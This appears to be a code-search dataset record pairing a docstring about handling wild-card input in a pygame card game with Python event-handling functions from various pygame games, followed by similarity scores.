\"solving\":\n self.state = \"stopping\"\n\n if self.state == \"solved\":\n self.state = \"waiting\"\n self.puzzle_state = \"solving\"\n self.button_text = \"Solve!\"\n self.board = self.original_board.copy()\n\n elif self.state == \"waiting\":\n self.state = \"solving\"\n self.button_text = \"Stop!\"\n self.button_color = BUTTON_COLOR_STOP\n\n isSolved = self.solve()\n\n self.button_color = BUTTON_COLOR_SOLVE\n if isSolved:\n self.state = \"solved\"\n self.button_text = \"Clear\"\n self.puzzle_state = \"solved\"\n else:\n 
if self.state == \"stopping\":\n self.state = \"waiting\"\n self.button_text = \"Solve!\"\n self.puzzle_state = \"solving\"\n else:\n self.state = \"solved\"\n self.button_text = \"Clear\"\n self.puzzle_state = \"failed\"", "def main():\n\tglobal FPSCLOCK, DISPLAYSURF, BASICFONT\n\tpygame.init()\n\tFPSCLOCK = pygame.time.Clock()\n\t# set up the window\n\tBASICFONT = pygame.font.Font('freesansbold.ttf', 20)\n\tDISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT), 0, 32)\n\tpygame.display.set_caption('Othello')\n\tDISPLAYSURF.fill(BGCOLOR)\n\t#Initialization of the variable\n\t###############################\n\ttestg = 0 #variable to contain result of testwinner\n\tboard = init_board() #variable to contain the board\n\tturn = 1 # whose turn is it {1: black, 2: white}\n\tdrawBoard()\n\twhile True:\n\t\tclicked_box = () #init\n\t\tlegals = possible(board,turn)\n\t\tfor e in pygame.event.get():\n\t\t\tif e.type == QUIT: #handling quitting\n\t\t\t\tpygame.quit()\n\t\t\t\tsys.exit()\n\t\t\telif e.type == MOUSEBUTTONUP: #handling click\n\t\t\t\tmousex,mousey = e.pos #record a click and its position\n\t\t\t\tclicked_box = isInBoard(mousex,mousey)\n\t\tif clicked_box != () and clicked_box in legals:\n\t\t\t#if it the clicked box is a legal move, make the move\n\t\t\tplayer_move = Move(clicked_box,turn, board)\n\t\t\tplayer_move.make(board)\n\t\t\twinner = test_winner(board)\n\t\t\tif winner: #if true : game is not done\n\t\t\t\t#tests the winner if the game is done\n\t\t\t\tif winner == 1:\n\t\t\t\t\tprint \"Black player winns\"\n\t\t\t\telif winner == 2:\n\t\t\t\t\tprint \"White player wins.\"\n\t\t\t\telif winner == 3:\n\t\t\t\t\tprint \"This is a tie game !\"\n\t\t\t\telse:\n\t\t\t\t\tturn = 2/(winner-3) # if res= 4 it is black's turn if it is 5 it is white's turn'\n\t\t\tturn = 2/turn\n\t\tpygame.display.update()\n\t\tFPSCLOCK.tick(FPS)", "def computer_play(self):\r\n # Depending on game flow, helped randomize when smack showed up\r\n # This is more of an Easter Egg than anything.\r\n if (self.tr.disks_on_board != 0 and (self.tr.disks_on_board % 6 == 0 or\r\n self.tr.disks_on_board % 6 == 3) and self.tr.turn_tracker):\r\n self.ai.talk_smack()\r\n # Computer identifies possible moves to analyze\r\n for item in self.tr.computer_moves:\r\n self.ai.coordinate_extractor(item)\r\n # Computer chooses move\r\n choice = self.ai.choose_move()\r\n # Makes play\r\n choice = self.tr.bd.disks[choice[0]][choice[1]]\r\n self.ai.moves_reset()\r\n choice.color, choice.display_on = 1, True\r\n choice.chain()\r\n # Checks for player move, if none, checks for another move\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n else:\r\n self.tr.board_scan_reset()\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n # If none, ends game\r\n else:\r\n if not self.tr.game_over:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def check_events_build_deck_screen(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n for i in range(1,8):\n if Rect(100 + 145*(i-1),130,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_add_card_to_deck(str(i),screen, screen_status,card_database_filter, user)\n for i in range(8,15):\n if Rect(100 
+ 145*(i-8),330,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_add_card_to_deck(str(i),screen, screen_status,card_database_filter, user)\n\n for i in range(1,7):\n if Rect(245 + 145*(i-1),600,130,180).collidepoint(pygame.mouse.get_pos()):\n build_deck_screen_remove_card_from_deck(str(i),screen, screen_status,card_database_filter, user)\n\n # ok sign on warning\n if Rect(1100, 62, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.build_deck_screen_end_screen_warning_button_display = ''\n\n elif rect_union(buttons).collidepoint(pygame.mouse.get_pos()):\n for button in buttons:\n if button.rect.collidepoint(pygame.mouse.get_pos()):\n\n if button.text == 'Save':\n build_deck_screen_save_deck_to_file(screen,buttons, screen_status, button_status, card_database_filter, user)\n if button_status.build_deck_screen_end_screen_warning_button_display == '':\n screen_status.build_deck_screen_display = False\n screen_status.prepare_screen_display = True\n\n\n elif button.text == 'Back':\n screen_status.welcome_screen_display = True\n screen_status.build_deck_screen_display = False\n screen_status.battle_screen_display = False\n elif button.text == '>>':\n screen_status.build_deck_screen_card_gallery_page_id += 1\n elif button.text == '<<':\n screen_status.build_deck_screen_card_gallery_page_id -= 1\n elif button.text == 'Character':\n card_database_filter.character = not card_database_filter.character\n elif button.text == 'Bowman':\n card_database_filter.bowman = not card_database_filter.bowman\n elif button.text == 'Magician':\n card_database_filter.magician = not card_database_filter.magician\n elif button.text == 'Thief':\n card_database_filter.thief = not card_database_filter.thief\n elif button.text == 'Warrior':\n card_database_filter.warrior = not card_database_filter.warrior\n elif button.text == 'Jobless':\n card_database_filter.jobless = not card_database_filter.jobless\n elif button.text == '>':\n screen_status.build_deck_screen_my_deck_page_id += 1\n elif button.text == '<':\n screen_status.build_deck_screen_my_deck_page_id -= 1\n\n\n elif event.type == pygame.MOUSEMOTION: # Mostly for zoom in\n x = 0 # indicator helps remove zoom in.\n\n # Card gallery\n for i in range(1,8):\n if Rect(100 + 145*(i-1),130,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'card gallery'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n for i in range(8,15):\n if Rect(100 + 145*(i-8),330,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'card gallery'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n # Hand zoom\n for i in range(1,7):\n if Rect(245 + 145*(i-1),600,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'hand'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n if Rect(65,600,130,180).collidepoint(pygame.mouse.get_pos()):\n button_status.card_zoom_active = True\n button_status.card_zoom_screen_indicator = 'build_deck_screen'\n button_status.card_zoom_part_indicator = 'character'\n button_status.card_zoom_position_indicator = str(i)\n x = 1\n\n if x == 0:\n button_status.card_zoom_active = 
False\n\n\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pass", "def events(num_of_frame, event):\r\n global name, score, code, balls_pool, targets_left, finished, have_friend_param, FPS\r\n if num_of_frame == 0: # first window, enter your name\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_BACKSPACE:\r\n name = name[:-1]\r\n else:\r\n name += event.unicode\r\n name = name.rstrip()\r\n elif num_of_frame == 1: # second window, the game itself\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n click(event)\r\n draw_text(screen, \"Score: \" + str(score), screen_height // 10, screen_width // 2, 0)\r\n elif event.type == pygame.KEYDOWN:\r\n code += event.unicode\r\n if \"i want to win\" in code:\r\n score = 9999998\r\n finished = True\r\n leaderboard_changing()\r\n FPS //= 10\r\n elif \"fuck you\" in code:\r\n score = -9999998\r\n finished = True\r\n leaderboard_changing()\r\n FPS //= 10\r\n elif \"kill star\" in code:\r\n if balls_pool[0][6]:\r\n balls_pool[0][6] = 0\r\n targets_left -= 1\r\n elif \"i have a friend\" in code:\r\n have_friend_param = True\r\n balls_pool[0][7] = 0\r\n balls_pool[0][8] = 0\r\n print(code)\r\n # third and last windows do nothing except waiting for closing\r", "def _check_keyup_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False # moving right key released, stop moving\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False # moving left key released, stop moving", "def _handle_events(self) -> (bool, bool):\n for event in pygame.event.get():\n if event.type == QUIT:\n # Handle whether we should quit\n return True, True\n elif event.type == KEYDOWN and not self._moved_this_frame:\n # If the user pushed a button this frame and the user has not moved this frame, let's move\n done, should_quit = self._handle_keydown_event(event.key)\n self._moved_this_frame = True\n if done and should_quit:\n return True, True\n elif done:\n return True, False\n\n\n # Now check all the keys that are pushed down (i.e., buttons that were not pushed this frame but are nevertheless pushed down)\n # But only do so if we haven't already moved this frame.\n if self._moved_this_frame:\n return False, None\n\n keys_pressed = pygame.key.get_pressed()\n for key in [K_DOWN, K_LEFT, K_RIGHT, K_UP, K_ESCAPE]:\n if keys_pressed[key]:\n done, should_quit = self._handle_keydown_event(key)\n self._moved_this_frame = True\n if done and should_quit:\n return True, True\n elif done:\n return True, False\n\n return False, None", "def event11510240():\n header(11510240, 1)\n end_if_client()\n\n skip_if_event_flag_off(2, EVENT.PaleEyeOrbReturned) # Pale Eye Orb must be returned.\n skip_if_event_flag_off(1, EVENT.SensGolemDead) # Sen's Golem must be dead.\n skip(2)\n chr.disable(1510100)\n end()\n\n if_in_world_area(0, 15, 1)\n if_time_elapsed(0, 5.0)\n if_event_flag_off(2, 11515050)\n if_action_button_state(2, 'character', 1510100, 180.0, -1, 7.0, 10010200)\n if_condition_true(0, 2)\n skip_if_singleplayer(2)\n message.dialog(10010194, ButtonType.ok_cancel, NumberButtons.no_button, -1, 3.0) # New message\n restart()\n skip_if_event_flag_on(2, EVENT.DarkAnorLondo)\n cutscene.play_cutscene_and_warp_player(150130, CutsceneType.skippable, 1502500, 15, 0)\n skip(1)\n cutscene.play_cutscene_and_warp_player(150132, CutsceneType.skippable, 1502500, 15, 0)\n wait_frames(1)\n restart()", "def human_expert(_obs):\n\n while True:\n env.render()\n print_play_keys(env.action_str)\n time.sleep(0.2)\n key_pressed = keyboard.read_key()\n # return index of action 
if valid key is pressed\n if key_pressed:\n if key_pressed in KEY_ACTION_DICT:\n return KEY_ACTION_DICT[key_pressed]\n elif key_pressed == \"esc\":\n print(\"You pressed esc, exiting!!\")\n break\n else:\n print(\"You pressed wrong key. Press Esc key to exit, OR:\")", "def _check_keydown_events(self, event):\n # print('key pressed was ', (event))\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True # move ship to the right\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True # move ship to the left\n elif event.key == pygame.K_q: # quit is Q is pressed\n sys.exit() \n elif event.key == pygame.K_SPACE:\n self._fire_bullet()", "def handle_mouse_press(self, event):" ]
[ "0.7081879", "0.6245746", "0.61995095", "0.61223036", "0.5956481", "0.58805364", "0.5852858", "0.5740237", "0.57229996", "0.57229334", "0.57194364", "0.571404", "0.5688867", "0.56664747", "0.5663727", "0.56603277", "0.56460625", "0.5638092", "0.5631298", "0.5616782", "0.5612591", "0.5601155", "0.55901194", "0.55827737", "0.5577245", "0.5572238", "0.556428", "0.5536535", "0.55344665", "0.55284804", "0.55205363", "0.5519296", "0.55169904", "0.5516169", "0.5512897", "0.55100965", "0.5506286", "0.55007434", "0.5500421", "0.546489", "0.5464771", "0.54595345", "0.54531306", "0.5451058", "0.5449895", "0.54453313", "0.5442165", "0.54265976", "0.54224324", "0.54220015", "0.5415356", "0.54140586", "0.5410896", "0.5410117", "0.5390476", "0.53861964", "0.5385729", "0.53790903", "0.53749245", "0.5365261", "0.5362909", "0.5360766", "0.53603387", "0.5359281", "0.53457373", "0.5343961", "0.53384423", "0.5338166", "0.5333677", "0.53274995", "0.5325219", "0.53245044", "0.5317266", "0.5314904", "0.5313454", "0.53115547", "0.53060836", "0.5302085", "0.52957654", "0.5280101", "0.527833", "0.5277101", "0.52753276", "0.52680755", "0.5265743", "0.5262759", "0.5261804", "0.526162", "0.52598506", "0.525849", "0.5257549", "0.52572525", "0.5256473", "0.5253176", "0.5249641", "0.524892", "0.5248492", "0.5245635", "0.5245217", "0.5239552" ]
0.7606982
0
This submits the next user input to the controller. In games with Shared_Board = False (e.g. HandAndFoot), keystrokes do nothing unless they designate values for prepared wild cards, at which time the mouse is ignored unless you want to clear the prepared cards. In games with Shared_Board = True, wilds on the board might change designation when other cards are played. If a designation cannot be handled automatically (i.e. the wild could sit at either the beginning or the end of a run), then it must be designated before play is completed. This is done in nextEventWildsOnBoard. All other events are ignored until num_wilds == 0 or play is canceled.
def nextEvent(self): if self.controller._state.rules.Shared_Board: self.num_wilds = len(self.controller.unassigned_wilds_dict.keys()) if self.num_wilds > 0: self.nextEventWildsOnBoard() for self.event in pygame.event.get(): if self.event.type == pygame.QUIT: # The window crashed, we should handle this print("pygame crash, AAAHHH") pygame.quit() quit() if not self.controller._state.rules.Shared_Board and self.num_wilds > 0: wild_instructions = 'Use the keyboard to designate your prepared wild cards \r\n ' wild_instructions = wild_instructions + '(use 0 for 10 and J, Q, or K for facecards).' self.controller.note = wild_instructions pos = pygame.mouse.get_pos() if self.event.type == pygame.MOUSEBUTTONDOWN: self.RuleSetsButtons.ClickedButton(self, pos) for element in self.hand_info: # cannot select prepared cards, so not included in logic below. if element.img_clickable.isOver(pos): if element.status == 1: element.status = 0 element.img_clickable.changeOutline(0) elif element.status == 0: element.status = 1 element.img_clickable.changeOutline(2) elif self.event.type == pygame.MOUSEMOTION: self.RuleSetsButtons.MouseHiLight(self, pos) HandManagement.MouseHiLight(self.hand_info, pos) elif self.event.type == pygame.KEYDOWN: if self.controller._state.rules.Buy_Option: if self.controller.buying_opportunity: if self.event.key == pygame.K_y: self.controller.wantTopCard(True) self.controller.note = 'You have signaled you want to buy the card.' elif self.event.key == pygame.K_n: self.controller.wantTopCard(False) self.controller.note = 'You have signaled you do not want to buy the card.' if not self.controller._state.rules.Shared_Board and self.num_wilds > 0: HandManagement.ManuallyAssign(self)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def nextEventWildsOnBoard(self):\n\n if self.controller._state.rules.Shared_Board and self.num_wilds > 0:\n for self.event in pygame.event.get():\n if self.event.type == pygame.QUIT:\n # The window crashed, we should handle this\n print(\"pygame crash, AAAHHH\")\n pygame.quit()\n quit()\n else:\n # in Shared_Board games, check if there are wilds that need to be updated.\n # All other events are ignored until play is finished.\n HandManagement.wildsHiLoGetInput(self)", "def perform_keyboard_actions(self):\n self.handle_keyboard_input()\n self.grid.next_frame()", "def next_cmd(self):\n if not self.validate():\n self.initial_focus.focus_set()\n return\n self.player_ships[self.values[0]] = self.values[1]\n self.num_players += 1\n self.e1.delete(0, END)\n self.buttonbox()\n self.e1.focus_set()\n self.e2.reset()", "def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))", "def play_keyboard_input_game(self):\n self.reset()\n while(not self._exit):\n pg.event.pump()\n self.clock.tick(self.actions_per_second)\n self.check_for_exit()\n self.perform_keyboard_actions()\n self.check_for_end_game()\n self.render()\n self.debug_to_console()\n\n self.cleanup()", "def computer_play(self):\r\n # Depending on game flow, helped randomize when smack showed up\r\n # This is more of an Easter Egg than anything.\r\n if (self.tr.disks_on_board != 0 and (self.tr.disks_on_board % 6 == 0 or\r\n self.tr.disks_on_board % 6 == 3) and self.tr.turn_tracker):\r\n self.ai.talk_smack()\r\n # Computer identifies possible moves to analyze\r\n for item in self.tr.computer_moves:\r\n self.ai.coordinate_extractor(item)\r\n # Computer chooses move\r\n choice = self.ai.choose_move()\r\n # Makes play\r\n choice = self.tr.bd.disks[choice[0]][choice[1]]\r\n self.ai.moves_reset()\r\n choice.color, choice.display_on = 1, True\r\n choice.chain()\r\n # Checks for player move, if none, checks for another move\r\n self.tr.board_scan_reset()\r\n if not self.tr.board_scan():\r\n return\r\n else:\r\n 
self.tr.board_scan_reset()\r\n if self.tr.board_scan():\r\n self.delay = frameCount\r\n return\r\n # If none, ends game\r\n else:\r\n if not self.tr.game_over:\r\n self.tr.board_scan_reset()\r\n self.tr.scanner()\r\n self.tr.game_over = True\r\n self.tr.run_game_is_over = frameCount", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", "def play_human_move(self):\n success, info = self.gms.play_human_move(raw_input('Make your next move\\n'.format('')))\n if success:\n print(self.gms.game.get_board_state_pretty())\n if info['status_code'] == core_constants.GAME_STATUS_HUMAN_MOVE_REQUIRED:\n self.play_human_move()\n elif info['status_code'] in [\n core_constants.GAME_STATUS_OVER_DRAW,\n core_constants.GAME_STATUS_OVER_HUMAN_WINNER,\n core_constants.GAME_STATUS_OVER_COMP_WINNER,\n ]:\n print(self.gms.status_code_message_map[info['status_code']])\n else:\n if info['error_code'] == core_constants.ERROR_CODE_INVALID_MOVE:\n self.play_human_move()", "def inputMove(self):\n # Check if BoardData_update is still opended\n self.checkOpenStatus()\n\n self.genDataFiles(self.player.getCurrentPieceList())\n print(\"PieceRecog.exe\", len(self.player.getCurrentPieceList()))\n\n # Call the recognition function\n os.system(\"PieceRecog.exe \" + str(len(self.player.getCurrentPieceList())))\n\n # Check if BoardData_update is still opended\n self.checkOpenStatus()\n self.player.updateData('src\\\\BoardData_update.csv')\n self.player.getChessPieceList('src\\\\BoardData_update.csv')\n self.pieceList = self.player.getCurrentPieceList()\n # Update the simulation board\n self.playGUI.drawBoard(self.player)\n\n check = self.setNextMove_AB()\n\n if check == 0:\n return True\n\n else:\n pd.DataFrame(self.player.getCurrentPieceList()).to_csv('src\\\\BoardData_update.csv', index=False)\n print(\"Piecelist after Alpha beta: \", self.pieceList)\n return check", "def run_game(self, board):\n run_program = True\n\n while run_program:\n # eventlistener for mouse events\n for event in pygame.event.get():\n if pygame.mouse.get_pressed() and event.type == pygame.MOUSEBUTTONDOWN:\n if event.type == pygame.MOUSEBUTTONDOWN:\n # Get position of mouse.\n (x, y) = pygame.mouse.get_pos()\n\n # Set circle position in the middle of the grid_square.\n draw_x = x - (x % self.square_size) + self.square_mid\n\n # Calculation to get xPosition from selected Mouse xPosition.\n x = x // 80\n\n # Check if column is full before placing. 
Break out if that's the case.\n if self.check_if_column_full(board, x):\n break\n\n # Calculate the yPosition, where the chip should be placed with various helper methods.\n draw_y = self.height - (self.square_size * self.draw_dict_mapping[self.get_y_pos(board, x)]) + 40\n\n # Check, which players turn it is.\n if self.playerOne:\n # Player Ones turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 1\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 1):\n run_program = False\n self.switch_player()\n else:\n # Player Twos turn.\n pos = (x, self.get_y_pos(board, x))\n if board[pos] == 0:\n board[pos] = 2\n self.draw_circle(draw_x, draw_y, self.playerOne)\n self.screen.blit(self.background, (0, 0))\n if self.check_if_user_won(board, pos, 2):\n run_program = False\n self.switch_player()\n\n if event.type == pygame.KEYDOWN:\n # End the game with escape.\n if event.key == pygame.K_ESCAPE:\n self.draw = True\n run_program = False\n\n # End the Program with the X in the upper right corner.\n elif event.type == pygame.QUIT:\n self.draw = True\n run_program = False\n\n pygame.display.flip()\n self.game_over(self.playerOne, self.draw)\n # wait for given time and end the game\n pygame.time.wait(5000)\n pygame.quit()", "def handle_keyboard_input(self):\n keys = pg.key.get_pressed()\n\n if (keys[K_UP]):\n self.grid.change_direction(Direction.up)\n if (keys[K_DOWN]):\n self.grid.change_direction(Direction.down)\n if (keys[K_LEFT]):\n self.grid.change_direction(Direction.left)\n if (keys[K_RIGHT]):\n self.grid.change_direction(Direction.right)\n if (keys[K_SPACE]):\n self.grid.snake.grow()\n if (keys[K_RIGHTBRACKET]):\n self.actions_per_second += 1\n if (keys[K_LEFTBRACKET]):\n self.actions_per_second -= 1\n if (keys[K_t]):\n self.is_training = True\n print(\"========================================================================\")\n print(\"Training: ON\")\n print(\"========================================================================\")\n if (keys[K_s]):\n self.is_training = False\n print(\"========================================================================\")\n print(\"Training: OFF\")\n print(\"========================================================================\")", "def main():\n board = [\n [' ', ' ', ' '],\n [' ', ' ', ' '],\n [' ', ' ', ' ']\n ]\n counter = 0\n\n while not check_victory(board):\n # This is called the game loop. It keeps the game running until it is finished.\n # On every iteration of the loop we check to see if a player has won.\n\n # Show the board to the player.\n show_board(board)\n\n # Take input to add a new token.\n board = take_input(board, OPTIONS[counter % 2])\n\n counter += 1", "def main():\n board_state = [['_', '_', '_'],\n ['_', '_', '_'],\n ['_', '_', '_']]\n\n player_turn = int(input(\"Who goes first - select AI(0) or Human(1)? \").strip())\n human_marker = input(\"Select marker - 'X' or 'O'? 
\").strip()\n \n play(board_state, player_turn, human_marker, 0)", "def next_play(self):\n\t\tfor card in self.hand:\n\t\t\tif is_valid(card):\n\t\t\t\tself.play_card(card)\n\t\t\t\treturn card\n\t\tglobal forced_rank\n\t\tif forced_rank == \"2\":\n\t\t\tglobal two_multiplier\n\t\t\tself.draw(two_multiplier)\n\t\t\tprint(f\"{self.name} draws {str(two_multiplier)} cards.\")\n\t\t\ttwo_multiplier = 0\n\t\t\tforced_rank = False\n\t\t\treturn None\n\t\tcard = self.draw(1)[0]\n\t\tprint(self.name + \" draws a card.\")\n\t\tif is_valid(card):\n\t\t\tself.play_card(card)\n\t\t\treturn card\n\t\tprint(self.name + \" passes the turn.\")", "def action_key_press(key, cur_key_type, cur_key, draw, phys, msg, timer, board, force):\n\n\n # delete any old mouse joints prior to dealing with the next keypress\n if key != \"m\" and msg.message != \"Mouse Move\" and cur_key_type == 0:\n for jn in phys.world.joints:\n if type(jn) is b2MouseJoint:\n phys.world.DestroyJoint(jn)\n\n if not key is None and key != \"\":\n if platform == \"linux\" or platform == \"linux2\":\n window = get_active_window_title()\n elif platform == \"win32\":\n window = gw.getActiveWindow().title\n\n if not \"Board\" in window and not \"Toolbar\" in window:\n pass\n else:\n if key == 255:\n pass\n\n elif key == \"r\" and cur_key_type == 0:\n # RESET SCREEN\n if sg.popup_yes_no(\"Are you sure you want to reset?\") == \"Yes\":\n draw.reset()\n msg = Messenger(phys.options[\"screen\"][\"fps\"], board)\n msg.set_message(\"Reset\")\n board.reset = True\n\n elif key == \"q\" and cur_key_type == 0:\n # QUIT\n msg.set_message(\"Quit\")\n val = sg.popup_yes_no(\"Are you sure you want to quit?\")\n if val == \"Yes\":\n board.run = False\n\n\n elif key == \"z\" and cur_key_type == 0:\n # SPAWN\n msg.set_message(\"Spawn\")\n phys.create_block()\n\n elif key == \"u\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Remove Joints\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"x\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Delete\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"p\" and cur_key_type == 0:\n # draw polygon\n draw.reset()\n # msg.set = {\"Dynamic Block\": draw.get_draw_type()}\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Dynamic Block\")\n\n elif key == \"g\" and cur_key_type == 0:\n # draw ground\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Static Block\")\n # options = {\"Static Block\": draw.get_draw_type()}\n\n # cur_key = msg.auto_set(options, key, force)\n\n elif key == \"i\" and cur_key_type == 0:\n # draw terrain\n\n draw.reset()\n options = {\"Generate Terrain\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n draw, phys, board = create_terrain(draw, phys, board=board)\n\n\n elif key == \"f\" and cur_key_type == 0:\n # draw fragments or select\n draw.reset()\n options = {\n \"Fragment Select\": SelectType.select} # \"Fragment Poly\": SelectType.draw, \"Frament Rectangle\": SelectType.rectangle,\n # \"Frament Select\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 0:\n # fire polygon\n draw.reset()\n options = {\"Create\": SelectType.select_point, \"Fire Block\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Joint 
Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \";\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Player Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Rotate\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"m\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Mouse Move\": SelectType.select, \"Normal Move\": SelectType.null, \"Joint Move\": SelectType.null,\n \"Clone Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"t\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Transform\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"e\" and cur_key_type == 0:\n # draw ropes\n if sg.popup_yes_no(\"Are you sure you want to kill all blocks?\") == \"Yes\":\n draw.reset()\n phys.kill_all(static=False)\n msg.set_message(\"Remove Blocks\")\n cur_key = \"e\"\n\n elif key == \"v\" and cur_key_type == 0:\n # draw ropes\n draw.reset()\n msg.set_message(\"Set Spawn\")\n cur_key = \"v\"\n\n elif key == \"h\" and cur_key_type == 0:\n # draw fragment ALL players\n # cur_key = \"h\"\n msg.set_message(\"Frag All\")\n draw.reset()\n blocks = [bl for bl in phys.block_list if not bl.static is True and not bl.is_terrain is True]\n phys.fractal_block(blocks, create=False, board=board)\n\n elif key == \"k\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Force\")\n\n\n elif key == \"l\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Splitter\")\n\n\n elif key == \"/\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"'\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Goal\")\n\n elif key == \"{\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Spawner\")\n\n\n elif key == \"~\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Motor Switch\")\n\n elif key == \"&\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Water\")\n\n\n elif key == \"^\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Low Gravity\")\n\n\n elif key == \"#\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Gravity Switch\")\n\n elif key == \")\" and cur_key_type == 0:\n # draw booster sensor\n 